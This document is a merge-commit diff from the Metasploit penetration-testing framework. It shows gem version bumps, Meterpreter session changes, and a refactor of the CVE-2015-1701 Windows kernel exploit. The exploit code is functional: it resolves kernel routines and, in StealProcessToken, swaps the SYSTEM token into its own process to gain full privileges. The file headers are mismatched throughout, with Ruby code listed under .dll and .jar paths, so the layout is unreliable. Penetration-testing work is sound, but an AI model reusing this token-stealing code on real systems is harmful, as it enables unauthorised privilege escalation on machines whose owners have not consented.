Merge branch 'upstream/master' into android-java-transport-refactor

Author: OJ

Gemfile.lock

@@ -124,7 +124,7 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.3)
-    metasploit_data_models (1.2.3)
+    metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       arel-helpers
@@ -156,7 +156,7 @@ GEM
       coderay (~> 1.1.0)
       method_source (~> 0.8.1)
       slop (~> 3.4)
-    rack (1.5.3)
+    rack (1.5.5)
     rack-test (0.6.3)
       rack (>= 1.0)
     rails (4.0.13)
@@ -174,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.5)
+    recog (2.0.6)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)

data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll

@@ -35,7 +35,14 @@
 #define HMUNIQSHIFT 16
 
 typedef NTSTATUS (NTAPI *pUser32_ClientCopyImage)(PVOID p);
-typedef NTSTATUS (NTAPI *pPLPBPI)(HANDLE ProcessId, PVOID *Process);
+typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
+	IN   HANDLE ProcessId,
+	OUT  PVOID Process
+);
+
+typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
+	_Inout_  PVOID Process
+);
 
 typedef PVOID	PHEAD;
 
@@ -65,19 +72,13 @@ typedef struct _SHAREDINFO {
 
 static const TCHAR	MAINWINDOWCLASSNAME[] = TEXT("usercls348_Mainwindow");
 
-pPLPBPI						g_PsLookupProcessByProcessIdPtr = NULL;
+lPsLookupProcessByProcessId g_pPsLookupProcessByProcessId = NULL;
+lPsReferencePrimaryToken    g_pPsReferencePrimaryToken = NULL;
 pUser32_ClientCopyImage		g_originalCCI = NULL;
 PVOID						g_ppCCI = NULL, g_w32theadinfo = NULL;
 int							g_shellCalled = 0;
 DWORD						g_OurPID;
 
-
-typedef PACCESS_TOKEN(NTAPI *lPsReferencePrimaryToken)(
-	_Inout_  PVOID Process
-);
-
-lPsReferencePrimaryToken pPsReferencePrimaryToken = NULL;
-
 typedef NTSTATUS (NTAPI *PRtlGetVersion)( _Inout_	PRTL_OSVERSIONINFOW lpVersionInformation );
 
 NTSTATUS NTAPI RtlGetVersion(
@@ -230,25 +231,15 @@ BOOLEAN supIsProcess32bit(
 	return FALSE;
 }
 
-/*
-* GetPsLookupProcessByProcessId
-*
-* Purpose:
-*
-* Return address of PsLookupProcessByProcessId routine to be used next by shellcode.
-*
-*/
-ULONG_PTR GetPsLookupProcessByProcessId(
-	VOID
-	)
+BOOL GetShellCodeFunctions(VOID)
 {
 	BOOL						cond = FALSE;
 	ULONG						rl = 0;
 	PVOID						MappedKernel = NULL;
 	ULONG_PTR					KernelBase = 0L, FuncAddress = 0L;
 	PRTL_PROCESS_MODULES		miSpace = NULL;
 	CHAR						KernelFullPathName[MAX_PATH * 2];
-
+	BOOL                        bSuccess = FALSE;
 
 	do {
 
@@ -278,12 +269,12 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 			break;
 		}
 
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
-		pPsReferencePrimaryToken = (lPsReferencePrimaryToken)((DWORD_PTR)KernelBase + ((DWORD_PTR)pPsReferencePrimaryToken - (DWORD_PTR)MappedKernel));
-
 		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsLookupProcessByProcessId");
-		FuncAddress = KernelBase + FuncAddress - (ULONG_PTR)MappedKernel;
+		g_pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
 
+		FuncAddress = (ULONG_PTR)GetProcAddress(MappedKernel, "PsReferencePrimaryToken");
+		g_pPsReferencePrimaryToken = (lPsReferencePrimaryToken)(KernelBase + FuncAddress - (ULONG_PTR)MappedKernel);
+		bSuccess = TRUE;
 	} while (cond);
 
 	if (MappedKernel != NULL) {
@@ -293,7 +284,39 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 		HeapFree(GetProcessHeap(), 0, miSpace);
 	}
 
-	return FuncAddress;
+	return bSuccess;
+}
+
+PSHAREDINFO GetSharedInfo(VOID) {
+	HMODULE	huser32;
+	PSHAREDINFO pSharedInfo = NULL;
+	DWORD dwCursor = 0;
+
+	huser32 = GetModuleHandle(TEXT("user32.dll"));
+	if (huser32 == NULL)
+		return pSharedInfo;
+
+	pSharedInfo = (PSHAREDINFO)GetProcAddress(huser32, TEXT("gSharedInfo"));
+
+#ifndef _M_X64
+	PVOID pUser32InitializeImmEntryTable;
+
+	/* user32!gSharedInfo resoultion for x86 systems < Windows 7 */
+	if (pSharedInfo != NULL)
+		return pSharedInfo;
+
+	pUser32InitializeImmEntryTable = GetProcAddress(huser32, TEXT("User32InitializeImmEntryTable"));
+
+	for (dwCursor = 0; dwCursor < 0x80; dwCursor++) {
+		if ( *((PBYTE)pUser32InitializeImmEntryTable + dwCursor) != 0x50 )
+			continue;
+		if (*((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 1) != 0x68)
+			continue;
+		return *((PSHAREDINFO *)((PBYTE)pUser32InitializeImmEntryTable + dwCursor + 2));
+	}
+#endif
+
+	return pSharedInfo;
 }
 
 /*
@@ -304,28 +327,22 @@ ULONG_PTR GetPsLookupProcessByProcessId(
 * Locate, convert and return hwnd for current thread from SHAREDINFO->aheList.
 *
 */
-HWND GetFirstThreadHWND(
-	VOID
-	)
+HWND GetFirstThreadHWND(VOID)
 {
 	PSHAREDINFO		pse;
-	HMODULE			huser32;
 	PHANDLEENTRY	List;
 	ULONG_PTR		c, k;
 
-	huser32 = GetModuleHandle(TEXT("user32.dll"));
-	if (huser32 == NULL)
-		return 0;
-
-	pse = (PSHAREDINFO)GetProcAddress(huser32, "gSharedInfo");
-	if (pse == NULL)
+	pse = GetSharedInfo();
+	if (pse == NULL) {
 		return 0;
+	}
 
 	List = pse->aheList;
 	k = pse->psi->cHandleEntries;
 
-	if (pse->HeEntrySize != sizeof(HANDLEENTRY))
-		return 0;
+	//if (pse->HeEntrySize != sizeof(HANDLEENTRY))
+		//return 0;
 
 	//
 	// Locate, convert and return hwnd for current thread.
@@ -334,12 +351,11 @@ HWND GetFirstThreadHWND(
 		if ((List[c].pOwner == g_w32theadinfo) && (List[c].bType == TYPE_WINDOW)) {
 			return (HWND)(c | (((ULONG_PTR)List[c].wUniq) << HMUNIQSHIFT));
 		}
-
 	return 0;
 }
 
 // Search the specified data structure for a member with CurrentValue.
-BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
+BOOL FindAndReplaceMember(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue, DWORD_PTR dwNewValue, DWORD_PTR dwMaxSize)
 {
 	DWORD_PTR dwIndex, dwMask;
 
@@ -376,29 +392,25 @@ BOOL find_and_replace_member(PDWORD_PTR pdwStructure, DWORD_PTR dwCurrentValue,
 * Copy system token to current process object.
 *
 */
-NTSTATUS NTAPI StealProcessToken(
-	VOID
-	)
+NTSTATUS NTAPI StealProcessToken(VOID)
 {
-	NTSTATUS Status;
-	PVOID CurrentProcess = NULL;
-	PVOID SystemProcess = NULL;
-
-	Status = g_PsLookupProcessByProcessIdPtr((HANDLE)g_OurPID, &CurrentProcess);
-	if (NT_SUCCESS(Status)) {
-		Status = g_PsLookupProcessByProcessIdPtr((HANDLE)4, &SystemProcess);
-		if (NT_SUCCESS(Status)) {
-			PACCESS_TOKEN targetToken = pPsReferencePrimaryToken(CurrentProcess);
-			PACCESS_TOKEN systemToken = pPsReferencePrimaryToken(SystemProcess);
-
-			// Find the token in the target process, and replace with the system token.
-			find_and_replace_member((PDWORD_PTR)CurrentProcess,
-				(DWORD_PTR)targetToken,
-				(DWORD_PTR)systemToken,
-				0x200);
-		}
-	}
-	return Status;
+	void *pMyProcessInfo = NULL;
+	void *pSystemInfo = NULL;
+	PACCESS_TOKEN systemToken;
+	PACCESS_TOKEN targetToken;
+
+	g_pPsLookupProcessByProcessId((HANDLE)g_OurPID, &pMyProcessInfo);
+	g_pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
+
+	targetToken = g_pPsReferencePrimaryToken(pMyProcessInfo);
+	systemToken = g_pPsReferencePrimaryToken(pSystemInfo);
+
+	// Find the token in the target process, and replace with the system token.
+	FindAndReplaceMember((PDWORD_PTR)pMyProcessInfo,
+		(DWORD_PTR)targetToken,
+		(DWORD_PTR)systemToken,
+		0x200);
+	return 0;
 }
 
 
@@ -476,9 +488,9 @@ void win32k_client_copy_image(LPVOID lpPayload)
 	}
 
 	g_OurPID = GetCurrentProcessId();
-	g_PsLookupProcessByProcessIdPtr = (PVOID)GetPsLookupProcessByProcessId();
+	GetShellCodeFunctions();
 
-	if (g_PsLookupProcessByProcessIdPtr == NULL) {
+	if (g_pPsLookupProcessByProcessId == NULL) {
 		return;
 	}
 

data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll

@@ -319,25 +319,28 @@ def is_valid_session?(timeout=10)
     false
   end
 
+  def update_session_info
+    username = self.sys.config.getuid
+    sysinfo  = self.sys.config.sysinfo
+
+    safe_info = "#{username} @ #{sysinfo['Computer']}"
+    safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
+    # Should probably be using Rex::Text.ascii_safe_hex but leave
+    # this as is for now since "\xNN" is arguably uglier than "_"
+    # showing up in various places in the UI.
+    safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_")
+    self.info = safe_info
+  end
+
   #
   # Populate the session information.
   #
   # Also reports a session_fingerprint note for host os normalization.
   #
-  def load_session_info()
+  def load_session_info
     begin
       ::Timeout.timeout(60) do
-        # Gather username/system information
-        username = self.sys.config.getuid
-        sysinfo  = self.sys.config.sysinfo
-
-        safe_info = "#{username} @ #{sysinfo['Computer']}"
-        safe_info.force_encoding("ASCII-8BIT") if safe_info.respond_to?(:force_encoding)
-        # Should probably be using Rex::Text.ascii_safe_hex but leave
-        # this as is for now since "\xNN" is arguably uglier than "_"
-        # showing up in various places in the UI.
-        safe_info.gsub!(/[\x00-\x08\x0b\x0c\x0e-\x19\x7f-\xff]+/n,"_")
-        self.info = safe_info
+        update_session_info
 
         hobj = nil
 

data/meterpreter/ext_server_android.jar

@@ -19,6 +19,13 @@ def initialize(rstream, opts={})
     self.platform = 'java/android'
   end
 
+  def load_android
+    original = console.disable_output
+    console.disable_output = true
+    console.run_single('load android')
+    console.disable_output = original
+  end
+
 end
 
 end

external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c

@@ -13,7 +13,7 @@ def initialize(info = {})
       [
         OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
         OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
-        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 10]),
+        OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]),
         OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
         OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
         OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
@@ -65,6 +65,12 @@ def on_session(session)
         end
       end
 
+      if session.platform =~ /android/i
+        if datastore['AutoLoadAndroid']
+          session.load_android
+        end
+      end
+
       [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
         if (datastore[key].empty? == false)
           args = Shellwords.shellwords( datastore[key] )

lib/msf/base/sessions/meterpreter.rb

@@ -142,8 +142,16 @@ def report_web_page(opts)
     page.cookie   = opts[:cookie] if opts[:cookie]
     page.auth     = opts[:auth]   if opts[:auth]
     page.mtime    = opts[:mtime]  if opts[:mtime]
-    page.ctype    = opts[:ctype]  if opts[:ctype]
+
+
+    if opts[:ctype].blank? || opts[:ctype] == [""]
+      page.ctype = ""
+    else
+      page.ctype = opts[:ctype]
+    end
+
     page.location = opts[:location] if opts[:location]
+
     msf_import_timestamps(opts, page)
     page.save!
 

lib/msf/base/sessions/meterpreter_android.rb

@@ -16,8 +16,6 @@ def initialize(path)
     @lock = Mutex.new
     @hash = {}
     @last = 0
-    ::FileUtils.mkdir_p(::File.dirname(path))
-    synced_update
   end
 
   def [](k)
@@ -53,6 +51,7 @@ def clear
   # Save the file, but prevent thread & process contention
   def synced_update(&block)
     @lock.synchronize do
+      ::FileUtils.mkdir_p(::File.dirname(path))
       ::File.open(path, ::File::RDWR|::File::CREAT) do |fd|
         fd.flock(::File::LOCK_EX)
 
@@ -81,7 +80,6 @@ def synced_update(&block)
     end
   end
 
-
   def parse_data(data)
     return {} if data.to_s.strip.length == 0
     begin